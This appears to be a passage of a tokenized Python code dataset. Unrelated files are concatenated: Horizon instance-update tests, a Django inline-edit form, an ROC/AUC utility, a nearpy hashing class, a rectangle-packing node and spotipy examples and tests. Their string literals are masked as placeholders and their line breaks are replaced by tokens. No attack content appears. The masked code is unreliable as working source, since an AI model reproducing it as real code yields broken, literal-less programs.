<NUM_LIT:0> ] . id <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_update_post ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> '<STR_LIT:name>' : NAME , <EOL> '<STR_LIT>' : self . TEST_TENANT , <EOL> '<STR_LIT:description>' : DESC } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_update ( IsA ( http . HttpRequest ) , <EOL> str ( INSTANCE_ID ) , NAME , DESC ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , <EOL> INSTANCE_ID ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_update_post_api_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : INSTANCE_ID , <EOL> '<STR_LIT:name>' : NAME , <EOL> '<STR_LIT>' : self . TEST_TENANT , <EOL> '<STR_LIT:description>' : DESC } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_update ( IsA ( http . HttpRequest ) , <EOL> str ( INSTANCE_ID ) , NAME , DESC ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , <EOL> INSTANCE_ID ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) </s>
<s> from django import forms <EOL> from django . forms import ValidationError <EOL> from django . forms . models import fields_for_model <EOL> class XEditableUpdateForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> pk = forms . CharField ( max_length = <NUM_LIT> ) <EOL> name = forms . CharField ( max_length = <NUM_LIT:100> ) <EOL> def __init__ ( self , model , data , * args , ** kwargs ) : <EOL> super ( XEditableUpdateForm , self ) . __init__ ( data , * args , ** kwargs ) <EOL> self . model = model <EOL> self . set_value_field ( model , data . get ( '<STR_LIT:name>' ) ) <EOL> def set_value_field ( self , model , field_name ) : <EOL> """<STR_LIT>""" <EOL> fields = fields_for_model ( model , fields = [ field_name ] ) <EOL> self . fields [ '<STR_LIT:value>' ] = fields [ field_name ] <EOL> def clean_name ( self ) : <EOL> """<STR_LIT>""" <EOL> field_name = self . cleaned_data [ '<STR_LIT:name>' ] <EOL> if hasattr ( self . model . _meta , '<STR_LIT>' ) : <EOL> field_names = [ field . name for field in self . model . _meta . get_fields ( ) ] <EOL> else : <EOL> field_names = self . model . _meta . get_all_field_names ( ) <EOL> if field_name not in field_names : <EOL> raise ValidationError ( "<STR_LIT>" % field_name ) <EOL> return field_name </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> import math <EOL> try : <EOL> import pylab <EOL> except : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> def random_mixture_model ( pos_mu = <NUM_LIT> , pos_sigma = <NUM_LIT> , neg_mu = <NUM_LIT> , neg_sigma = <NUM_LIT> , size = <NUM_LIT:200> ) : <EOL> pos = [ ( <NUM_LIT:1> , random . gauss ( pos_mu , pos_sigma ) , ) for x in xrange ( size / <NUM_LIT:2> ) ] <EOL> neg = [ ( <NUM_LIT:0> , random . gauss ( neg_mu , neg_sigma ) , ) for x in xrange ( size / <NUM_LIT:2> ) ] <EOL> return pos + neg <EOL> def plot_multiple_rocs_separate ( rocList , title = '<STR_LIT>' , labels = None , equal_aspect = True ) : <EOL> """<STR_LIT>""" <EOL> pylab . clf ( ) <EOL> pylab . title ( title ) <EOL> for ix , r in enumerate ( rocList ) : <EOL> ax = pylab . subplot ( <NUM_LIT:4> , <NUM_LIT:4> , ix + <NUM_LIT:1> ) <EOL> pylab . ylim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> ax . set_yticklabels ( [ ] ) <EOL> ax . set_xticklabels ( [ ] ) <EOL> if equal_aspect : <EOL> cax = pylab . gca ( ) <EOL> cax . set_aspect ( '<STR_LIT>' ) <EOL> if not labels : <EOL> labels = [ '<STR_LIT>' for x in rocList ] <EOL> pylab . text ( <NUM_LIT> , <NUM_LIT:0.1> , labels [ ix ] , fontsize = <NUM_LIT:8> ) <EOL> pylab . plot ( [ x [ <NUM_LIT:0> ] for x in r . derived_points ] , [ y [ <NUM_LIT:1> ] for y in r . derived_points ] , '<STR_LIT>' , linewidth = <NUM_LIT:2> ) <EOL> pylab . show ( ) <EOL> def _remove_duplicate_styles ( rocList ) : <EOL> """<STR_LIT>""" <EOL> pref_styles = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> points = '<STR_LIT>' <EOL> colors = '<STR_LIT>' <EOL> lines = [ '<STR_LIT:->' , '<STR_LIT>' , '<STR_LIT::>' ] <EOL> rand_ls = [ ] <EOL> for r in rocList : <EOL> if r . linestyle not in rand_ls : <EOL> rand_ls . append ( r . linestyle ) <EOL> else : <EOL> while True : <EOL> if len ( pref_styles ) > <NUM_LIT:0> : <EOL> pstyle = pref_styles . pop ( ) <EOL> if pstyle not in rand_ls : <EOL> r . linestyle = pstyle <EOL> rand_ls . append ( pstyle ) <EOL> break <EOL> else : <EOL> ls = '<STR_LIT>' . join ( random . sample ( colors , <NUM_LIT:1> ) + random . sample ( points , <NUM_LIT:1> ) + random . sample ( lines , <NUM_LIT:1> ) ) <EOL> if ls not in rand_ls : <EOL> r . linestyle = ls <EOL> rand_ls . append ( ls ) <EOL> break <EOL> def plot_multiple_roc ( rocList , title = '<STR_LIT>' , labels = None , include_baseline = False , equal_aspect = True ) : <EOL> """<STR_LIT>""" <EOL> pylab . clf ( ) <EOL> pylab . ylim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . yticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . grid ( True ) <EOL> if equal_aspect : <EOL> cax = pylab . gca ( ) <EOL> cax . set_aspect ( '<STR_LIT>' ) <EOL> pylab . xlabel ( "<STR_LIT>" ) <EOL> pylab . ylabel ( "<STR_LIT>" ) <EOL> pylab . title ( title ) <EOL> if not labels : <EOL> labels = [ '<STR_LIT>' for x in rocList ] <EOL> _remove_duplicate_styles ( rocList ) <EOL> for ix , r in enumerate ( rocList ) : <EOL> pylab . plot ( [ x [ <NUM_LIT:0> ] for x in r . derived_points ] , [ y [ <NUM_LIT:1> ] for y in r . derived_points ] , r . linestyle , linewidth = <NUM_LIT:1> , label = labels [ ix ] ) <EOL> if include_baseline : <EOL> pylab . plot ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> if labels : <EOL> pylab . legend ( loc = '<STR_LIT>' ) <EOL> pylab . show ( ) <EOL> def load_decision_function ( path ) : <EOL> """<STR_LIT>""" <EOL> fileHandler = open ( path , '<STR_LIT:r>' ) <EOL> reader = fileHandler . readlines ( ) <EOL> reader = [ line . strip ( ) . split ( ) for line in reader ] <EOL> model_data = [ ] <EOL> for line in reader : <EOL> if len ( line ) == <NUM_LIT:0> : continue <EOL> fClass , fValue = line <EOL> model_data . append ( ( int ( fClass ) , float ( fValue ) ) ) <EOL> fileHandler . close ( ) <EOL> return model_data <EOL> class ROCData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data , linestyle = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . data = sorted ( data , lambda x , y : cmp ( y [ <NUM_LIT:1> ] , x [ <NUM_LIT:1> ] ) ) <EOL> self . linestyle = linestyle <EOL> self . auc ( ) <EOL> def auc ( self , fpnum = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> fps_count = <NUM_LIT:0> <EOL> relevant_pauc = [ ] <EOL> current_index = <NUM_LIT:0> <EOL> max_n = len ( [ x for x in self . data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> if fpnum == <NUM_LIT:0> : <EOL> relevant_pauc = [ x for x in self . data ] <EOL> elif fpnum > max_n : <EOL> fpnum = max_n <EOL> else : <EOL> while fps_count < fpnum : <EOL> relevant_pauc . append ( self . data [ current_index ] ) <EOL> if self . data [ current_index ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> fps_count += <NUM_LIT:1> <EOL> current_index += <NUM_LIT:1> <EOL> total_n = len ( [ x for x in relevant_pauc if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> total_p = len ( relevant_pauc ) - total_n <EOL> previous_df = - <NUM_LIT> <EOL> current_index = <NUM_LIT:0> <EOL> points = [ ] <EOL> tp_count , fp_count = <NUM_LIT:0.0> , <NUM_LIT:0.0> <EOL> tpr , fpr = <NUM_LIT:0> , <NUM_LIT:0> <EOL> while current_index < len ( relevant_pauc ) : <EOL> df = relevant_pauc [ current_index ] [ <NUM_LIT:1> ] <EOL> if previous_df != df : <EOL> points . append ( ( fpr , tpr , fp_count ) ) <EOL> if relevant_pauc [ current_index ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> fp_count += <NUM_LIT:1> <EOL> elif relevant_pauc [ current_index ] [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> tp_count += <NUM_LIT:1> <EOL> fpr = fp_count / total_n <EOL> tpr = tp_count / total_p <EOL> previous_df = df <EOL> current_index += <NUM_LIT:1> <EOL> points . append ( ( fpr , tpr , fp_count ) ) <EOL> points . sort ( key = lambda i : ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] ) ) <EOL> self . derived_points = points <EOL> return self . _trapezoidal_rule ( points ) <EOL> def _trapezoidal_rule ( self , curve_pts ) : <EOL> """<STR_LIT>""" <EOL> cum_area = <NUM_LIT:0.0> <EOL> for ix , x in enumerate ( curve_pts [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) : <EOL> cur_pt = x <EOL> next_pt = curve_pts [ ix + <NUM_LIT:1> ] <EOL> cum_area += ( ( cur_pt [ <NUM_LIT:1> ] + next_pt [ <NUM_LIT:1> ] ) / <NUM_LIT> ) * ( next_pt [ <NUM_LIT:0> ] - cur_pt [ <NUM_LIT:0> ] ) <EOL> return cum_area <EOL> def calculateStandardError ( self , fpnum = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> area = self . auc ( fpnum ) <EOL> Na = len ( [ x for x in self . data if x [ <NUM_LIT:0> ] == <NUM_LIT:1> ] ) <EOL> Nn = len ( [ x for x in self . data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> Q1 = area / ( <NUM_LIT> - area ) <EOL> Q2 = <NUM_LIT:2> * area * area / ( <NUM_LIT:1.0> + area ) <EOL> return math . sqrt ( ( area * ( <NUM_LIT:1.0> - area ) + ( Na - <NUM_LIT:1.0> ) * ( Q1 - area * area ) + <EOL> ( Nn - <NUM_LIT:1.0> ) * ( Q2 - area * area ) ) / ( Na * Nn ) ) <EOL> def plot ( self , title = '<STR_LIT>' , include_baseline = False , equal_aspect = True ) : <EOL> """<STR_LIT>""" <EOL> pylab . clf ( ) <EOL> pylab . plot ( [ x [ <NUM_LIT:0> ] for x in self . derived_points ] , [ y [ <NUM_LIT:1> ] for y in self . derived_points ] , self . linestyle ) <EOL> if include_baseline : <EOL> pylab . plot ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] , '<STR_LIT>' ) <EOL> pylab . ylim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> pylab . xticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . yticks ( pylab . arange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> pylab . grid ( True ) <EOL> if equal_aspect : <EOL> cax = pylab . gca ( ) <EOL> cax . set_aspect ( '<STR_LIT>' ) <EOL> pylab . xlabel ( '<STR_LIT>' ) <EOL> pylab . ylabel ( '<STR_LIT>' ) <EOL> pylab . title ( title ) <EOL> pylab . show ( ) <EOL> def confusion_matrix ( self , threshold , do_print = False ) : <EOL> """<STR_LIT>""" <EOL> pos_points = [ x for x in self . data if x [ <NUM_LIT:1> ] >= threshold ] <EOL> neg_points = [ x for x in self . data if x [ <NUM_LIT:1> ] < threshold ] <EOL> tp , fp , fn , tn = self . _calculate_counts ( pos_points , neg_points ) <EOL> if do_print : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( tp , fp ) <EOL> print "<STR_LIT>" % ( fn , tn ) <EOL> return { '<STR_LIT>' : tp , '<STR_LIT>' : fp , '<STR_LIT>' : fn , '<STR_LIT>' : tn } <EOL> def evaluateMetrics ( self , matrix , metric = None , do_print = False ) : <EOL> """<STR_LIT>""" <EOL> accuracy = ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) / float ( sum ( matrix . values ( ) ) ) <EOL> sensitivity = ( matrix [ '<STR_LIT>' ] ) / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> specificity = ( matrix [ '<STR_LIT>' ] ) / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> efficiency = ( sensitivity + specificity ) / <NUM_LIT> <EOL> positivePredictiveValue = matrix [ '<STR_LIT>' ] / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> NegativePredictiveValue = matrix [ '<STR_LIT>' ] / float ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) <EOL> PhiCoefficient = ( matrix [ '<STR_LIT>' ] * matrix [ '<STR_LIT>' ] - matrix [ '<STR_LIT>' ] * matrix [ '<STR_LIT>' ] ) / ( <EOL> math . sqrt ( ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) * <EOL> ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) * <EOL> ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) * <EOL> ( matrix [ '<STR_LIT>' ] + matrix [ '<STR_LIT>' ] ) ) ) or <NUM_LIT:1.0> <EOL> if do_print : <EOL> print '<STR_LIT>' , sensitivity <EOL> print '<STR_LIT>' , specificity <EOL> print '<STR_LIT>' , efficiency <EOL> print '<STR_LIT>' , accuracy <EOL> print '<STR_LIT>' , positivePredictiveValue <EOL> print '<STR_LIT>' , NegativePredictiveValue <EOL> print '<STR_LIT>' , PhiCoefficient <EOL> return { '<STR_LIT>' : sensitivity , '<STR_LIT>' : specificity , '<STR_LIT>' : accuracy , '<STR_LIT>' : efficiency , <EOL> '<STR_LIT>' : positivePredictiveValue , '<STR_LIT>' : NegativePredictiveValue , '<STR_LIT>' : PhiCoefficient } <EOL> def _calculate_counts ( self , pos_data , neg_data ) : <EOL> """<STR_LIT>""" <EOL> tp_count = len ( [ x for x in pos_data if x [ <NUM_LIT:0> ] == <NUM_LIT:1> ] ) <EOL> fp_count = len ( [ x for x in pos_data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> fn_count = len ( [ x for x in neg_data if x [ <NUM_LIT:0> ] == <NUM_LIT:1> ] ) <EOL> tn_count = len ( [ x for x in neg_data if x [ <NUM_LIT:0> ] == <NUM_LIT:0> ] ) <EOL> return tp_count , fp_count , fn_count , tn_count <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> from optparse import OptionParser <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , default = <NUM_LIT:0> , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store_true>" , dest = '<STR_LIT>' , default = False , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , '<STR_LIT>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> if ( not options . origFile ) : <EOL> parser . print_help ( ) <EOL> exit ( ) <EOL> df_data = load_decision_function ( options . origFile ) <EOL> roc = ROCData ( df_data ) <EOL> roc_n = int ( options . fp_n ) <EOL> print "<STR_LIT>" % ( str ( roc . auc ( roc_n ) ) , ) <EOL> print '<STR_LIT>' % ( str ( roc . calculateStandardError ( roc_n ) ) , ) <EOL> print '<STR_LIT>' <EOL> for pt in roc . derived_points : <EOL> print pt [ <NUM_LIT:0> ] , pt [ <NUM_LIT:1> ] <EOL> if options . plotFlag : <EOL> roc . plot ( options . ptitle , True , True ) </s>
<s> import numpy <EOL> from nearpy . hashes import LSHash , RandomBinaryProjections , PCABinaryProjections , RandomBinaryProjectionTree <EOL> from nearpy . hashes . permutation import Permutation <EOL> class HashPermutations ( LSHash ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , hash_name ) : <EOL> """<STR_LIT>""" <EOL> super ( HashPermutations , self ) . __init__ ( hash_name ) <EOL> self . permutation = Permutation ( ) <EOL> self . child_hashes = [ ] <EOL> self . dim = None <EOL> def reset ( self , dim ) : <EOL> """<STR_LIT>""" <EOL> self . dim = dim <EOL> for child_hash in self . child_hashes : <EOL> child_hash [ '<STR_LIT>' ] . reset ( dim ) <EOL> child_hash [ '<STR_LIT>' ] = { } <EOL> def hash_vector ( self , v , querying = False ) : <EOL> """<STR_LIT>""" <EOL> bucket_keys = [ ] <EOL> if querying : <EOL> for child_hash in self . child_hashes : <EOL> lshash = child_hash [ '<STR_LIT>' ] <EOL> if not lshash . hash_name in self . permutation . permutedIndexs : <EOL> raise AttributeError ( '<STR_LIT>' % lshash . hash_name ) <EOL> for bucket_key in lshash . hash_vector ( v , querying ) : <EOL> neighbour_keys = self . permutation . get_neighbour_keys ( lshash . hash_name , bucket_key ) <EOL> for n in neighbour_keys : <EOL> bucket_keys . append ( lshash . hash_name + '<STR_LIT:_>' + n ) <EOL> else : <EOL> for child_hash in self . child_hashes : <EOL> lshash = child_hash [ '<STR_LIT>' ] <EOL> for bucket_key in lshash . hash_vector ( v , querying ) : <EOL> child_hash [ '<STR_LIT>' ] [ bucket_key ] = bucket_key <EOL> bucket_keys . append ( lshash . hash_name + '<STR_LIT:_>' + bucket_key ) <EOL> return bucket_keys <EOL> def get_config ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : self . hash_name , <EOL> '<STR_LIT>' : self . dim <EOL> } <EOL> def apply_config ( self , config ) : <EOL> """<STR_LIT>""" <EOL> self . hash_name = config [ '<STR_LIT>' ] <EOL> self . dim = config [ '<STR_LIT>' ] <EOL> def add_child_hash ( self , child_hash , permute_config ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( child_hash , PCABinaryProjections ) or isinstance ( child_hash , RandomBinaryProjections ) or isinstance ( child_hash , RandomBinaryProjectionTree ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . child_hashes . append ( { '<STR_LIT>' : child_hash , '<STR_LIT>' : permute_config , '<STR_LIT>' : { } } ) <EOL> def build_permuted_index ( self ) : <EOL> """<STR_LIT>""" <EOL> for child_hash in self . child_hashes : <EOL> config = child_hash [ '<STR_LIT>' ] <EOL> num_permutation = config [ '<STR_LIT>' ] <EOL> beam_size = config [ '<STR_LIT>' ] <EOL> num_neighbour = config [ '<STR_LIT>' ] <EOL> bucket_keys = child_hash [ '<STR_LIT>' ] . keys ( ) <EOL> lshash = child_hash [ '<STR_LIT>' ] <EOL> self . permutation . build_permuted_index ( lshash , bucket_keys , num_permutation , beam_size , num_neighbour ) </s>
<s> import subprocess <EOL> def main ( ) : <EOL> errno = subprocess . call ( [ '<STR_LIT>' ] ) <EOL> raise SystemExit ( errno ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from math . rect import Rect <EOL> class Node : <EOL> def __init__ ( self , x , y , width , height ) : <EOL> self . x = x <EOL> self . y = y <EOL> self . width = width <EOL> self . height = height <EOL> def does_rect_fit ( self , width , height ) : <EOL> resultList = [ ] <EOL> result = False <EOL> edgeCount = <NUM_LIT:0> <EOL> if ( width == self . width or height == self . height or width == self . height or height == self . width ) : <EOL> if ( width == self . width ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> if ( height == self . height ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> elif ( width == self . height ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> if ( height == self . width ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> elif ( height == self . width ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> elif ( height == self . height ) : <EOL> edgeCount += <NUM_LIT:1> <EOL> if ( width <= self . width and height <= self . height ) : <EOL> result = True <EOL> elif ( height <= self . width and width <= self . height ) : <EOL> result = True <EOL> resultList . append ( result ) <EOL> resultList . append ( edgeCount ) <EOL> return ( resultList ) <EOL> def get_rect ( self ) : <EOL> return Rect ( self . x , self . y , self . x + self . width , self . y + self . height ) <EOL> def validate ( self , node ) : <EOL> r1 = self . get_rect ( ) <EOL> r2 = node . get_rect ( ) <EOL> return ( r1 != r2 ) <EOL> def merge ( self , node ) : <EOL> ret = False <EOL> r1 = self . get_rect ( ) <EOL> r2 = node . get_rect ( ) <EOL> r1 . x2 += <NUM_LIT:1> <EOL> r1 . y2 += <NUM_LIT:1> <EOL> r2 . x2 += <NUM_LIT:1> <EOL> r2 . y2 += <NUM_LIT:1> <EOL> if ( r1 . x1 == r2 . x1 and r1 . x2 == r2 . x2 and r1 . y1 == r2 . y2 ) : <EOL> self . y = node . y <EOL> self . height += node . get_rect ( ) . height <EOL> ret = True <EOL> elif ( r1 . x1 == r2 . x1 and r1 . x2 == r2 . x2 and r1 . y2 == r2 . y1 ) : <EOL> self . height += node . get_rect ( ) . height <EOL> ret = True <EOL> elif ( r1 . y1 == r2 . y1 and r1 . y2 == r2 . y1 and r1 . x1 == r2 . x2 ) : <EOL> self . x = node . x <EOL> self . width += node . get_rect ( ) . width <EOL> ret = True <EOL> elif ( r1 . y1 == r2 . y1 and r1 . y2 == r2 . y1 and r1 . x2 == r2 . x1 ) : <EOL> self . width += node . get_rect ( ) . width <EOL> ret = True <EOL> return ret </s>
<s> import pprint <EOL> import sys <EOL> import spotipy <EOL> import spotipy . util as util <EOL> import simplejson as json <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> username = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> print ( "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] , ) ) <EOL> sys . exit ( ) <EOL> scope = '<STR_LIT>' <EOL> token = util . prompt_for_user_token ( username , scope ) <EOL> if token : <EOL> sp = spotipy . Spotify ( auth = token ) <EOL> sp . trace = False <EOL> ranges = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for range in ranges : <EOL> print "<STR_LIT>" , range <EOL> results = sp . current_user_top_tracks ( time_range = range , limit = <NUM_LIT:50> ) <EOL> for i , item in enumerate ( results [ '<STR_LIT>' ] ) : <EOL> print i , item [ '<STR_LIT:name>' ] , '<STR_LIT>' , item [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> print <EOL> else : <EOL> print ( "<STR_LIT>" , username ) </s>
<s> import spotipy <EOL> from spotipy import util <EOL> import unittest <EOL> import pprint <EOL> import sys <EOL> import simplejson as json <EOL> '''<STR_LIT>''' <EOL> class AuthTestSpotipy ( unittest . TestCase ) : <EOL> '''<STR_LIT>''' <EOL> playlist = "<STR_LIT>" <EOL> four_tracks = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> two_tracks = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> other_tracks = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> bad_id = '<STR_LIT>' <EOL> def test_track_bad_id ( self ) : <EOL> try : <EOL> track = spotify . track ( self . bad_id ) <EOL> self . assertTrue ( False ) <EOL> except spotipy . SpotifyException : <EOL> self . assertTrue ( True ) <EOL> def test_basic_user_profile ( self ) : <EOL> user = spotify . user ( username ) <EOL> self . assertTrue ( user [ '<STR_LIT:id>' ] == username ) <EOL> def test_current_user ( self ) : <EOL> user = spotify . current_user ( ) <EOL> self . assertTrue ( user [ '<STR_LIT:id>' ] == username ) <EOL> def test_me ( self ) : <EOL> user = spotify . me ( ) <EOL> self . assertTrue ( user [ '<STR_LIT:id>' ] == username ) <EOL> def test_user_playlists ( self ) : <EOL> playlists = spotify . user_playlists ( username , limit = <NUM_LIT:5> ) <EOL> self . assertTrue ( '<STR_LIT>' in playlists ) <EOL> self . assertTrue ( len ( playlists [ '<STR_LIT>' ] ) == <NUM_LIT:5> ) <EOL> def test_user_playlist_tracks ( self ) : <EOL> playlists = spotify . user_playlists ( username , limit = <NUM_LIT:5> ) <EOL> self . assertTrue ( '<STR_LIT>' in playlists ) <EOL> for playlist in playlists [ '<STR_LIT>' ] : <EOL> user = playlist [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> pid = playlist [ '<STR_LIT:id>' ] <EOL> results = spotify . user_playlist_tracks ( user , pid ) <EOL> self . assertTrue ( len ( results [ '<STR_LIT>' ] ) >= <NUM_LIT:0> ) <EOL> def user_playlist_tracks ( self , user , playlist_id = None , fields = None , <EOL> limit = <NUM_LIT:100> , offset = <NUM_LIT:0> ) : <EOL> self . assertTrue ( len ( playlists [ '<STR_LIT>' ] ) == <NUM_LIT:5> ) <EOL> def test_current_user_saved_tracks ( self ) : <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> self . assertTrue ( len ( tracks [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_saved_albums ( self ) : <EOL> albums = spotify . current_user_saved_albums ( ) <EOL> self . assertTrue ( len ( albums [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_save_and_unsave_tracks ( self ) : <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> total = tracks [ '<STR_LIT>' ] <EOL> spotify . current_user_saved_tracks_add ( self . four_tracks ) <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> new_total = tracks [ '<STR_LIT>' ] <EOL> self . assertTrue ( new_total - total == len ( self . four_tracks ) ) <EOL> tracks = spotify . current_user_saved_tracks_delete ( self . four_tracks ) <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> new_total = tracks [ '<STR_LIT>' ] <EOL> self . assertTrue ( new_total == total ) <EOL> def test_categories ( self ) : <EOL> response = spotify . categories ( ) <EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_category_playlists ( self ) : <EOL> response = spotify . categories ( ) <EOL> for cat in response [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> cat_id = cat [ '<STR_LIT:id>' ] <EOL> response = spotify . category_playlists ( category_id = cat_id ) <EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] [ "<STR_LIT>" ] ) > <NUM_LIT:0> ) <EOL> def test_new_releases ( self ) : <EOL> response = spotify . new_releases ( ) <EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_featured_releases ( self ) : <EOL> response = spotify . featured_playlists ( ) 